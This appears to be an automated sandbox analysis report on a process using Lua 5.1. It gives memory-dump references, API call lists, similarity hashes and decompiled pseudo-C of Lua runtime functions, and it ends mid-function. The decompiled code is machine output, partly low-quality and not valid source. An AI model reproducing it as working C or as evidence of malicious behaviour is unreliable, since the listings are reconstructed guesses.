lua_tolstring.LUA5.1(?,000000FF,00000000,?), ref: 009C1AF9
lua_pushnil.LUA5.1(?), ref: 009C1B08
lua_pushnil.LUA5.1(?), ref: 009C1B11

Memory Dump Source

Source File: 00000003.00000002.486890418.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.486863680.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486943477.00000000009C3000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486972534.00000000009C4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487005169.00000000009C5000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnil.$L_optlstring.$L_buffinit.L_pushresult.lua_tolstring.
String ID:
API String ID: 3302033068-0
Opcode ID: f1244854a76353ae292fa9067520e75bb46b359f5d910e0d7dd6538db9434129
Instruction ID: e199c590f0b3b61f993d3a0cd647b6208afa821188bd4b7709840d2002b74acd
Opcode Fuzzy Hash: f1244854a76353ae292fa9067520e75bb46b359f5d910e0d7dd6538db9434129
Instruction Fuzzy Hash: C431C4B2D082052BD720FB149C42FEBB79CDBD5354F480A2DFE9946143F929A90987A7

Uniqueness

Uniqueness Score: -1.00%

Function 009C1470, Relevance: 16.6, APIs: 11, Instructions: 119COMMON

Download Yara Rule

APIs

luaL_optlstring.LUA5.1(?,00000001,00000000,?), ref: 009C1490
lua_pushnil.LUA5.1(?), ref: 009C14A6
lua_pushnil.LUA5.1(?,?), ref: 009C14AC
luaL_buffinit.LUA5.1(?,?), ref: 009C14CA
luaL_optlstring.LUA5.1(?,00000002,00000000,?), ref: 009C14FD
luaL_pushresult.LUA5.1(?), ref: 009C1510
lua_tolstring.LUA5.1(?,000000FF,00000000,?), ref: 009C1519
lua_pushnil.LUA5.1(?), ref: 009C1528
lua_pushnil.LUA5.1(?), ref: 009C1531

Memory Dump Source

Source File: 00000003.00000002.486890418.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.486863680.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486943477.00000000009C3000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486972534.00000000009C4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487005169.00000000009C5000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnil.$L_optlstring.$L_buffinit.L_pushresult.lua_tolstring.
String ID:
API String ID: 3302033068-0
Opcode ID: f1244854a76353ae292fa9067520e75bb46b359f5d910e0d7dd6538db9434129
Instruction ID: 0e51b37484ebfa29f831d45b57c92fc68a148ee7430244604b728f40ef374c3c
Opcode Fuzzy Hash: f1244854a76353ae292fa9067520e75bb46b359f5d910e0d7dd6538db9434129
Instruction Fuzzy Hash: C2310772C082452BD620BB149C42FFB779CDBD5354F480A2DFE9942143F929A50987F7

Uniqueness

Uniqueness Score: -1.00%

Function 00A22AA0, Relevance: 16.6, APIs: 11, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00A22AA0(intOrPtr __eax, intOrPtr _a4) {
				intOrPtr _v4;
				signed int _v8;
				signed int _t15;
				intOrPtr _t18;
				signed int _t19;
				signed int* _t20;
				intOrPtr _t21;
				signed int _t22;
				signed int* _t24;
				signed int* _t26;

				_t21 = _a4;
				_push(0);
				_push(1);
				_push(_t21);
				L00A23F32();
				_push(_t21);
				_v4 = __eax;
				L00A23F38();
				_t15 = __eax + __eax + __eax + __eax + __eax + __eax + __eax + __eax;
				_push(_t15);
				_push(_t21);
				L00A23F2C();
				_t19 = _t15;
				_push(_t21);
				_v8 = _t19;
				L00A23F38();
				_t22 = _t15;
				_t18 = 2;
				_t24 =  &(( &_v8)[7]);
				if(_t22 > 2) {
					_t20 = _t19 + 4;
					do {
						_push(_t18);
						_push(_t21);
						L00A23F4A();
						_t24 =  &(_t24[2]);
						if(_t15 != 0) {
							_push(_t18);
							_push(_t21);
							L00A23F50();
							_t26 =  &(_t24[2]);
							_push(_t18);
							_push(_t21);
							if(_t15 == 0) {
								 *((intOrPtr*)(_t20 - 4)) = 2;
								L00A23F62();
							} else {
								 *((intOrPtr*)(_t20 - 4)) = 0xc;
								L00A23F0E();
							}
							 *_t20 = _t15;
							_t24 =  &(_t26[2]);
						} else {
							 *((intOrPtr*)(_t20 - 4)) = 0xc;
							 *_t20 = _t15;
						}
						_t18 = _t18 + 1;
						_t20 =  &(_t20[2]);
					} while (_t18 < _t22);
					_t19 = _v8;
				}
				_push(_t21);
				L00A23F38();
				 *((intOrPtr*)(_t19 + _t15 * 8 - 0x10)) = 6;
				_push(_v4);
				_push(0xffffd8f0);
				_push(_t21);
				L00A23F02();
				_push(0xfffffffe);
				_push(_t21);
				L00A23F1A();
				return 1;
			}

0x00a22aa6
0x00a22aab
0x00a22aad
0x00a22aaf
0x00a22ab0
0x00a22ab5
0x00a22ab6
0x00a22aba
0x00a22ac3
0x00a22ac5
0x00a22ac6
0x00a22ac7
0x00a22acc
0x00a22ace
0x00a22acf
0x00a22ad3
0x00a22ad8
0x00a22ada
0x00a22adf
0x00a22ae4
0x00a22ae6
0x00a22af0
0x00a22af0
0x00a22af1
0x00a22af2
0x00a22af7
0x00a22afc
0x00a22b09
0x00a22b0a
0x00a22b0b
0x00a22b10
0x00a22b15
0x00a22b16
0x00a22b17
0x00a22b27
0x00a22b2e
0x00a22b19
0x00a22b19
0x00a22b20
0x00a22b20
0x00a22b33
0x00a22b35
0x00a22afe
0x00a22afe
0x00a22b05
0x00a22b05
0x00a22b38
0x00a22b3b
0x00a22b3e
0x00a22b42
0x00a22b42
0x00a22b46
0x00a22b47
0x00a22b4c
0x00a22b58
0x00a22b59
0x00a22b5e
0x00a22b5f
0x00a22b64
0x00a22b66
0x00a22b67
0x00a22b7b

APIs

luaL_checklstring.LUA5.1(?,00000001,00000000), ref: 00A22AB0
lua_gettop.LUA5.1(?,?,00000001,00000000), ref: 00A22ABA
lua_newuserdata.LUA5.1(?,00000000,?,?,00000001,00000000), ref: 00A22AC7
lua_gettop.LUA5.1(?,?,00000000,?,?,00000001,00000000), ref: 00A22AD3
lua_type.LUA5.1(?,00000002), ref: 00A22AF2
lua_isuserdata.LUA5.1(?,00000002), ref: 00A22B0B
lua_touserdata.LUA5.1(?,00000002), ref: 00A22B20
lua_gettop.LUA5.1(?), ref: 00A22B47
lua_getfield.LUA5.1(?,FFFFD8F0,?,?), ref: 00A22B5F
lua_setmetatable.LUA5.1(?,000000FE,?,FFFFD8F0,?,?), ref: 00A22B67

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_gettop.$L_checklstring.lua_getfield.lua_isuserdata.lua_newuserdata.lua_setmetatable.lua_touserdata.lua_type.
String ID:
API String ID: 3181126804-0
Opcode ID: 8013a967962d1fa372ea38bd30aa8a84754d36c3b883a71e7683268427a9905e
Instruction ID: aad52a1292d875dfe4f986685bd23b55e31403f126f64d991734c53bc380e993
Opcode Fuzzy Hash: 8013a967962d1fa372ea38bd30aa8a84754d36c3b883a71e7683268427a9905e
Instruction Fuzzy Hash: 1711C0B39062227BDB116B2CBF42BAE76A89F52300F440134F9008A241E36D5A1987F6

Uniqueness

Uniqueness Score: -1.00%

Function 1000FC20, Relevance: 16.6, APIs: 11, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000FC20(void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				void* __ebx;
				void* _t18;
				intOrPtr _t19;
				void* _t21;
				void* _t23;
				intOrPtr _t26;
				void* _t27;
				void* _t39;

				_t39 = __fp0;
				_t19 = _a8;
				_t26 = _a4;
				if(_t19 <= 0) {
					_t36 = _t19 - 0xffffd8f0;
					if(_t19 > 0xffffd8f0) {
						_t18 = E10001150(_t26);
						_t27 = _t27 + 4;
						_t19 = _t19 + _t18 + 1;
					}
				}
				if(E10001410(_t36, _t26, 0xffffffff) != 0) {
					E10001C30(__eflags, _t39, _t26, _t19, 0);
					_t21 = E10001670(__eflags, _t39, _t26, 0xffffffff);
					E10001160(_t26, 0xfffffffe);
					__eflags = _t21;
					if(__eflags == 0) {
						_t23 = E10001770(_t19, __eflags, _t26, _t19) + 1;
						__eflags = _t23;
						E10001EB0(_t23, _t26, _t19, _t23);
						return _t23;
					} else {
						E10001C30(__eflags, _t39, _t26, _t19, _t21);
						E10001EB0(__eflags, _t26, _t19, 0);
						E10001EB0(__eflags, _t26, _t19, _t21);
						return _t21;
					}
				} else {
					return E10001160(_t26, 0xfffffffe) | 0xffffffff;
				}
			}

0x1000fc20
0x1000fc21
0x1000fc26
0x1000fc2c
0x1000fc2e
0x1000fc34
0x1000fc37
0x1000fc3c
0x1000fc3f
0x1000fc3f
0x1000fc34
0x1000fc50
0x1000fc68
0x1000fc78
0x1000fc7a
0x1000fc82
0x1000fc84
0x1000fcb7
0x1000fcb7
0x1000fcbb
0x1000fcc8
0x1000fc86
0x1000fc89
0x1000fc92
0x1000fc9d
0x1000fcaa
0x1000fcaa
0x1000fc52
0x1000fc62
0x1000fc62

APIs

lua_gettop.LUA5.1(?), ref: 1000FC37
lua_type.LUA5.1(?,000000FF), ref: 1000FC46
lua_settop.LUA5.1(?,000000FE), ref: 1000FC55
lua_rawgeti.LUA5.1(?,?,00000000), ref: 1000FC68
lua_tointeger.LUA5.1(?,000000FF,?,?,00000000), ref: 1000FC70
lua_settop.LUA5.1(?,000000FE,?,000000FF,?,?,00000000), ref: 1000FC7A
lua_rawgeti.LUA5.1(?,?,00000000), ref: 1000FC89
lua_rawseti.LUA5.1(?,?,00000000,?,?,00000000), ref: 1000FC92
lua_rawseti.LUA5.1(?,?,00000000), ref: 1000FC9D
lua_objlen.LUA5.1(?,?), ref: 1000FCAD
lua_rawseti.LUA5.1(?,?,00000001), ref: 1000FCBB

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_rawseti.$lua_rawgeti.lua_settop.$lua_gettop.lua_objlen.lua_tointeger.lua_type.
String ID:
API String ID: 2551836479-0
Opcode ID: c840ce9a7cea58034214fb8c2510e53ddaba4a4676512f6b9fda0f29d5c1db7b
Instruction ID: 0371ef6f8b57820c2d28cf47ea0de8014af53aab162097858eaf5ff5a75fe1cd
Opcode Fuzzy Hash: c840ce9a7cea58034214fb8c2510e53ddaba4a4676512f6b9fda0f29d5c1db7b
Instruction Fuzzy Hash: 791108AEA0A96836F00191696D83EDF225DCFC21F9F240324F924912CAFB157E1501FA

Uniqueness

Uniqueness Score: -1.00%

Function 00993730, Relevance: 16.6, APIs: 11, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00993730(intOrPtr __eax, long long __fp0, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				long long _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t13;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t25;
				signed int _t27;
				void* _t30;
				void* _t31;
				long long _t35;

				_t35 = __fp0;
				_t25 = _a4;
				_push(0);
				_push(0);
				_push(_t25);
				_v20 = 1;
				L00994ACA();
				_push(_t25);
				L00994B60();
				_t30 = (_t27 & 0xfffffff8) - 0x14 + 0x10;
				_v16 = __eax;
				while(1) {
					asm("fild dword [esp+0x10]");
					_v12 = _t35;
					_t22 = _v8;
					_t17 = _v12;
					_push(_t22);
					_push(_t17);
					_push(_t25);
					L00994B5A();
					_t13 = _a8;
					_push(_t13);
					_push(_t25);
					L00994B00();
					_push(0xffffffff);
					_push(_t25);
					L00994AFA();
					_t31 = _t30 + 0x1c;
					if(_t13 == 0) {
						break;
					}
					_push(_t22);
					_push(_t17);
					_push(_t25);
					L00994B5A();
					_push(0xfffffffe);
					_push(_t25);
					L00994B90();
					_push(_v16);
					_push(_t25);
					L00994B42();
					_push(_t22);
					_push(_t17);
					_push(_t25);
					L00994B5A();
					_push(_v16);
					_push(_t25);
					L00994B42();
					_t30 = _t31 + 0x30;
					_v20 = _v20 + 1;
				}
				_push(0xfffffffe);
				_push(_t25);
				L00994AB8();
				return _t13;
			}

0x00993730
0x0099373b
0x0099373f
0x00993741
0x00993743
0x00993744
0x0099374c
0x00993751
0x00993752
0x00993757
0x0099375a
0x0099375e
0x0099375e
0x00993762
0x00993766
0x0099376a
0x0099376e
0x0099376f
0x00993770
0x00993771
0x00993776
0x00993779
0x0099377a
0x0099377b
0x00993780
0x00993782
0x00993783
0x00993788
0x0099378d
0x00000000
0x00000000
0x0099378f
0x00993790
0x00993791
0x00993792
0x00993797
0x00993799
0x0099379a
0x009937a3
0x009937a4
0x009937a5
0x009937aa
0x009937ab
0x009937ac
0x009937ad
0x009937b6
0x009937b7
0x009937b8
0x009937c1
0x009937c5
0x009937c5
0x009937cb
0x009937cd
0x009937ce
0x009937dc

APIs

lua_createtable.LUA5.1 ref: 0099374C
lua_gettop.LUA5.1(?), ref: 00993752
lua_pushnumber.LUA5.1(?,?,?,00000000,00000000,?,00000001,?,00000001,00000000,?,?), ref: 00993771
lua_gettable.LUA5.1(?,00000000,?,?,?,00000000,00000000,?,00000001,?,00000001,00000000,?,?), ref: 0099377B
lua_type.LUA5.1(?,000000FF,?,00000000,?,?,?,00000000,00000000,?,00000001,?,00000001,00000000,?,?), ref: 00993783
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000001,?,00000001), ref: 00993792
lua_pushvalue.LUA5.1(?,000000FE,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000001), ref: 0099379A
lua_settable.LUA5.1(?,?,?,000000FE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009937A5
lua_pushnumber.LUA5.1(?,?,?,?,?,?,000000FE,?,?,?), ref: 009937AD
lua_settable.LUA5.1(?,?,?,?,?,?,?,?,000000FE,?,?,?), ref: 009937B8
lua_settop.LUA5.1(?,000000FE,?,?,?,?,?,?,?,00000000,00000000,?,00000001,?,00000001,00000000), ref: 009937CE

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnumber.$lua_settable.$lua_createtable.lua_gettable.lua_gettop.lua_pushvalue.lua_settop.lua_type.
String ID:
API String ID: 693531042-0
Opcode ID: b4ed4b075c62f96dabfbf9d20c5cd9adbe44ce288af2dee79d678210e908db47
Instruction ID: f29fa5073a198b37283e77e5ab734aa47f8be8690e9d03051227741d557d9402
Opcode Fuzzy Hash: b4ed4b075c62f96dabfbf9d20c5cd9adbe44ce288af2dee79d678210e908db47
Instruction Fuzzy Hash: 141194B14096157ADA02BE1D9C42F9FB7ACDFC6364F104708F96452182D721DA0387FB

Uniqueness

Uniqueness Score: -1.00%

Function 10013CF0, Relevance: 16.6, APIs: 11, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10013CF0(void* __ebx, void* __eflags, intOrPtr _a4) {
				void* _t5;
				void* _t11;
				void* _t14;
				void* _t17;
				void* _t18;
				void* _t19;

				_t20 = __eflags;
				_t16 = _a4;
				E1000F410(__ebx, __eflags, _a4, 1, 5);
				E1000F410(__ebx, __eflags, _a4, 2, 6);
				E100018C0(_t16);
				_t5 = E10002380(_t20, _t16, 1);
				_t18 = _t17 + 0x24;
				_t21 = _t5;
				if(_t5 == 0) {
					L3:
					return 0;
				} else {
					while(1) {
						E100013D0(_t21, _t16, 2);
						E100013D0(_t21, _t16, 0xfffffffd);
						E100013D0(_t21, _t16, 0xfffffffd);
						E10002070(_t16, 2, 1);
						_t11 = E10001410(_t21, _t16, 0xffffffff);
						_t19 = _t18 + 0x2c;
						_t22 = _t11;
						if(_t11 != 0) {
							break;
						}
						E10001160(_t16, 0xfffffffd);
						_t14 = E10002380(_t22, _t16, 1);
						_t18 = _t19 + 0x10;
						if(_t14 != 0) {
							continue;
						} else {
							goto L3;
						}
						goto L5;
					}
					return 1;
				}
				L5:
			}

0x10013cf0
0x10013cf1
0x10013cfa
0x10013d04
0x10013d0a
0x10013d12
0x10013d17
0x10013d1a
0x10013d1c
0x10013d66
0x10013d69
0x10013d1e
0x10013d1e
0x10013d21
0x10013d29
0x10013d31
0x10013d3b
0x10013d43
0x10013d48
0x10013d4b
0x10013d4d
0x00000000
0x00000000
0x10013d52
0x10013d5a
0x10013d5f
0x10013d64
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10013d64
0x10013d70
0x10013d70
0x00000000

APIs

luaL_checktype.LUA5.1(?,00000001,00000005), ref: 10013CFA

Part of subcall function 1000F410: lua_type.LUA5.1(?,?), ref: 1000F41C

luaL_checktype.LUA5.1(?,00000002,00000006,?,00000001,00000005), ref: 10013D04
lua_pushnil.LUA5.1(?,?,00000002,00000006,?,00000001,00000005), ref: 10013D0A
lua_next.LUA5.1(?,00000001,?,?,00000002,00000006,?,00000001,00000005), ref: 10013D12
lua_pushvalue.LUA5.1(?,00000002), ref: 10013D21
lua_pushvalue.LUA5.1(?,000000FD,?,00000002), ref: 10013D29
lua_pushvalue.LUA5.1(?,000000FD,?,000000FD,?,00000002), ref: 10013D31
lua_call.LUA5.1(?,00000002,00000001,?,000000FD,?,000000FD,?,00000002), ref: 10013D3B
lua_type.LUA5.1(?,000000FF,?,00000002,00000001,?,000000FD,?,000000FD,?,00000002), ref: 10013D43
lua_settop.LUA5.1(?,000000FD), ref: 10013D52
lua_next.LUA5.1(?,00000001,?,000000FD), ref: 10013D5A

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushvalue.$L_checktype.lua_next.lua_type.$lua_call.lua_pushnil.lua_settop.
String ID:
API String ID: 284392769-0
Opcode ID: e76de9ce1940270963f0bb0775e6f332ce3f62c77b066074fd392365fc798dfa
Instruction ID: 3c649f485242135b20ba9315535be0c6efb0973cc92b1fcd000c46680cd1f7b3
Opcode Fuzzy Hash: e76de9ce1940270963f0bb0775e6f332ce3f62c77b066074fd392365fc798dfa
Instruction Fuzzy Hash: 15F0FF7965962231F525A2293C43FCF11488F027E4F114210F524794CBEE99B7C210EE

Uniqueness

Uniqueness Score: -1.00%

Function 10008AC0, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 178
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10008AC0(void* __ebx, intOrPtr __ecx, void* __eflags, void* __fp0) {
				char* _t64;
				intOrPtr* _t80;
				intOrPtr _t83;
				intOrPtr _t87;
				char _t89;
				intOrPtr _t96;
				signed int _t101;
				void* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t112;
				void* _t114;
				void* _t123;

				_t123 = __fp0;
				_t85 = __ecx;
				_t105 =  *((intOrPtr*)(_t111 + 0x2c));
				_t101 = 1;
				 *(_t111 + 0x18) = 1;
				E10008D50(__ecx, __eflags, _t105, 0x1001ab10);
				_t107 =  *(_t111 + 0x3c);
				_t64 = strchr( *(_t111 + 0x3c), 0x25);
				_t112 = _t111 + 0x10;
				 *(_t112 + 0xc) = _t64;
				if(_t64 == 0) {
					L23:
					E10008D50(_t85, _t121, _t105, _t107);
					_t59 = _t101 + 1; // 0x2
					E1000D8C0(_t123, _t105, _t59, ( *((intOrPtr*)(_t105 + 8)) -  *((intOrPtr*)(_t105 + 0xc)) >> 4) - 1);
					_t96 =  *((intOrPtr*)(_t105 + 8)) + ( ~_t101 << 4);
					 *((intOrPtr*)(_t105 + 8)) = _t96;
					return  *((intOrPtr*)(_t96 - 0x10)) + 0x10;
				}
				_t87 =  *((intOrPtr*)(_t112 + 0x38));
				_t104 = _t87 - 4;
				 *((intOrPtr*)(_t112 + 0x3c)) = _t87 + 0xfffffff8;
				while(1) {
					L3:
					_t80 =  *((intOrPtr*)(_t105 + 8));
					 *_t80 = E1000BB00(_t105, _t107, _t64 - _t107);
					 *((intOrPtr*)(_t80 + 8)) = 4;
					_t114 = _t112 + 0xc;
					if( *((intOrPtr*)(_t105 + 0x1c)) -  *((intOrPtr*)(_t105 + 8)) <= 0x10) {
						E10005280(_t105, 1);
						_t114 = _t114 + 8;
					}
					 *((intOrPtr*)(_t105 + 8)) =  *((intOrPtr*)(_t105 + 8)) + 0x10;
					_t83 =  *((intOrPtr*)(_t114 + 0x10));
					_t89 =  *((intOrPtr*)(_t83 + 1));
					_t17 = _t89 - 0x25; // -33
					if(_t17 > 0x4e) {
						goto L18;
					}
					switch( *((intOrPtr*)(0 +  &M10008CE4))) {
						case 0:
							_push("%");
							goto L20;
						case 1:
							__eax =  *((intOrPtr*)(__esp + 0x3c));
							 *((char*)(__esp + 0x35)) = 0;
							__eax =  *((intOrPtr*)(__esp + 0x3c)) + 4;
							__edi = __edi + 4;
							 *((intOrPtr*)(__esp + 0x3c)) =  *((intOrPtr*)(__esp + 0x3c)) + 4;
							__ecx = __esp + 0x34;
							 *((char*)(__esp + 0x34)) =  *__edi;
							L19:
							_push(_t89);
							goto L20;
						case 2:
							asm("fild dword [edi+0x4]");
							__edi = __edi + 4;
							 *((intOrPtr*)(__eax + 8)) = 3;
							 *__eax = __fp0;
							__ecx =  *((intOrPtr*)(__esi + 8));
							 *((intOrPtr*)(__esp + 0x3c)) =  *((intOrPtr*)(__esp + 0x3c)) + 4;
							__eflags =  *((intOrPtr*)(__esi + 0x1c)) - __ecx - 0x10;
							if(__eflags > 0) {
								goto L15;
							}
							E10005280(__esi, 1) =  *((intOrPtr*)(__esi + 8));
							__eax =  *((intOrPtr*)(__esi + 8)) + 0x10;
							 *((intOrPtr*)(__esi + 8)) =  *((intOrPtr*)(__esi + 8)) + 0x10;
							goto L21;
						case 3:
							__ecx =  *((intOrPtr*)(__esp + 0x3c));
							__edi = __edi + 8;
							__ecx =  *((intOrPtr*)(__esp + 0x3c)) + 8;
							 *((intOrPtr*)(__esp + 0x3c)) = __ecx;
							__fp0 =  *__ecx;
							 *__eax = __fp0;
							 *((intOrPtr*)(__eax + 8)) = 3;
							 *((intOrPtr*)(__esi + 0x1c)) =  *((intOrPtr*)(__esi + 0x1c)) -  *((intOrPtr*)(__esi + 8));
							__eflags =  *((intOrPtr*)(__esi + 0x1c)) -  *((intOrPtr*)(__esi + 8)) - 0x10;
							if(__eflags <= 0) {
								__eax = E10005280(__esi, 1);
							}
							L15:
							 *((intOrPtr*)(__esi + 8)) =  *((intOrPtr*)(__esi + 8)) + 0x10;
							goto L21;
						case 4:
							__ecx =  *((intOrPtr*)(__edi + 4));
							__eax =  *((intOrPtr*)(__esp + 0x3c));
							__edi = __edi + 4;
							__eax =  *((intOrPtr*)(__esp + 0x3c)) + 4;
							 *((intOrPtr*)(__esp + 0x48)) =  *((intOrPtr*)(__esp + 0x3c)) + 4;
							sprintf(__esp + 0x1c, "%p", __ecx) = __esp + 0x24;
							__eax = E10008D50(__ecx, __eflags, __esi, __esp + 0x24);
							goto L21;
						case 5:
							_t77 =  *(_t104 + 4);
							_t104 = _t104 + 4;
							_t120 = _t77;
							 *((intOrPtr*)(_t114 + 0x3c)) =  *((intOrPtr*)(_t114 + 0x3c)) + 4;
							if(_t77 == 0) {
								_t77 = "(null)";
							}
							_push(_t77);
							L20:
							_push(_t105);
							E10008D50(_t89, _t120);
							_t115 = _t114 + 8;
							L21:
							_t107 = _t83 + 2;
							_t85 =  *((intOrPtr*)(_t115 + 0x14)) + 2;
							 *((intOrPtr*)(_t115 + 0x1c)) =  *((intOrPtr*)(_t115 + 0x14)) + 2;
							_t76 = strchr(_t83 + 2, 0x25);
							_t112 = _t115 + 8;
							 *(_t112 + 0x10) = _t76;
							_t121 = _t76;
							if(_t76 != 0) {
								_t64 =  *(_t112 + 0x10);
								goto L3;
							}
							_t101 =  *(_t112 + 0x14);
							goto L23;
						case 6:
							goto L18;
					}
					L18:
					 *((char*)(_t114 + 0x39)) = _t89;
					 *((char*)(_t114 + 0x38)) = 0x25;
					 *((char*)(_t114 + 0x3a)) = 0;
					_t89 = _t114 + 0x38;
					goto L19;
				}
			}

0x10008ac0
0x10008ac0
0x10008ac5
0x10008aca
0x10008ad5
0x10008ad9
0x10008ade
0x10008ae5
0x10008aeb
0x10008aee
0x10008af4
0x10008ca7
0x10008ca9
0x10008cb6
0x10008cc0
0x10008cd0
0x10008cd3
0x10008ce3
0x10008ce3
0x10008afa
0x10008aff
0x10008b05
0x10008b0f
0x10008b0f
0x10008b0f
0x10008b1c
0x10008b1e
0x10008b2d
0x10008b33
0x10008b38
0x10008b3d
0x10008b3d
0x10008b46
0x10008b4b
0x10008b4f
0x10008b55
0x10008b5b
0x00000000
0x00000000
0x10008b69
0x00000000
0x10008c59
0x00000000
0x00000000
0x10008b90
0x10008b94
0x10008b99
0x10008b9c
0x10008b9f
0x10008ba3
0x10008ba9
0x10008c72
0x10008c72
0x00000000
0x00000000
0x10008bb2
0x10008bb5
0x10008bbc
0x10008bc6
0x10008bcb
0x10008bd0
0x10008bd4
0x10008bd7
0x00000000
0x00000000
0x10008be1
0x10008be7
0x10008bea
0x00000000
0x00000000
0x10008bf2
0x10008bf6
0x10008bf9
0x10008bfc
0x10008c00
0x10008c02
0x10008c04
0x10008c0e
0x10008c11
0x10008c14
0x10008c19
0x10008c1e
0x10008c21
0x10008c21
0x00000000
0x00000000
0x10008c27
0x10008c2a
0x10008c2e
0x10008c36
0x10008c3f
0x10008c49
0x10008c4f
0x00000000
0x00000000
0x10008b74
0x10008b77
0x10008b7d
0x10008b7f
0x10008b83
0x10008b85
0x10008b85
0x10008b8a
0x10008c73
0x10008c73
0x10008c74
0x10008c79
0x10008c7c
0x10008c80
0x10008c83
0x10008c89
0x10008c8d
0x10008c93
0x10008c96
0x10008c9a
0x10008c9c
0x10008b0b
0x00000000
0x10008b0b
0x10008ca2
0x00000000
0x00000000
0x00000000
0x00000000
0x10008c60
0x10008c60
0x10008c64
0x10008c69
0x10008c6e
0x00000000
0x10008c6e

APIs

Part of subcall function 10008D50: luaS_newlstr.LUA5.1(1001AB10,?,?,00000001,?,?,10008ADE,?,1001AB10,?,?,?), ref: 10008D6D
Part of subcall function 10008D50: luaD_growstack.LUA5.1(1001AB10,00000001,?,?,?), ref: 10008D92

strchr.MSVCRT ref: 10008AE5
luaS_newlstr.LUA5.1(?,?,00000000,?), ref: 10008B17
luaD_growstack.LUA5.1(?,00000001,?,?,?,?,?,?,?,?,?,?), ref: 10008B38
strchr.MSVCRT ref: 10008C8D

Strings

(null), xrefs: 10008B85, 10008B8A
%, xrefs: 10008C64

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: D_growstack.S_newlstr.strchr
String ID: %$(null)
API String ID: 3204026142-3027058318
Opcode ID: 422c89eaf275a0c0abdb8d1d8f1508fe368213e69961961af83a6096540192ac
Instruction ID: b51a6234e5b3a5a0e7dd1905a3110803ec671e07aa4a403601959c8eede9fb79
Opcode Fuzzy Hash: 422c89eaf275a0c0abdb8d1d8f1508fe368213e69961961af83a6096540192ac
Instruction Fuzzy Hash: A7518BB1509B01AFE310CF19CC80A5BBBF5FF85244F44881DF59A47356D771EA188B66

Uniqueness

Uniqueness Score: -1.00%

Function 10015D80, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10015D80(void* __eflags, intOrPtr _a4, intOrPtr* _a8, char _a12) {
				intOrPtr* _t14;
				intOrPtr _t19;
				intOrPtr _t23;
				intOrPtr _t27;
				intOrPtr* _t35;
				void* _t47;
				intOrPtr* _t48;
				void* _t49;
				void* _t50;

				_t14 = E1000F4A0(__eflags, _a4, _a12,  &_a12);
				_t48 = _a8;
				_t35 = _t14;
				_t50 = _t49 + 0xc;
				_t47 = _t48 + 0x20c;
				_t53 =  *_t48 - _t47;
